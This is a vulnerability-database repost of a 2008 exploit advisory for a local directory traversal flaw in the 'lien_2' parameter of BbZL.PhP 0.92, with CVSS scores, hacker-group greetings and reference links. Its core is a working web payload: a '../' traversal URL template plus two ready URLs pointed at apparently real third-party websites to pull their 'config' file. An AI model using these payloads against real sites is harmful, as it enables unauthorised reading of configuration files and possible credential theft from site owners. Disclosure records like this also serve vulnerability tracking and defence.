BbZL.PhP 0.92 (lien_2) Local Directory Traversal Vulnerability

2008.10.26
Credit: jiko
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

------------------------------------------------------------------------- -- JIKI Team [ JIKO + KIl1er ] --- ------------------------------------------------------------------------- # Author : jiko # email : jalikom@hotmail.com # Home : www.no-back.org # Script : BbZL.PhP # Bug : Local Directory Traversal # Download : http://sylvain.pasquet1.free.fr/index.php?type=1&base=vjek&nom=Téléchargements =========================JIkI Team=================== # Exploit : http://localhost/cc/bbzl092/index.php?type=3&lien_2=../ #ex : http://sylvain.pasquet1.free.fr/index.php?type=3&lien_2=config http://barbeuzweb.free.fr/index.php?type=3&lien_2=config =========================JIKI Team=================== greetz : all my friend and H-T Team and Stack-Terrorist and Gold_M and all No-back members and tryag.Com visit: www.no-back.org & www.tryag.com ------------------------------------------------------------------------- -- JIKI Team [ JIKO + KIl1er ] -- -------------------------------------------------------------------------

References:

http://www.securityfocus.com/bid/31464
http://www.milw0rm.com/exploits/6617


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top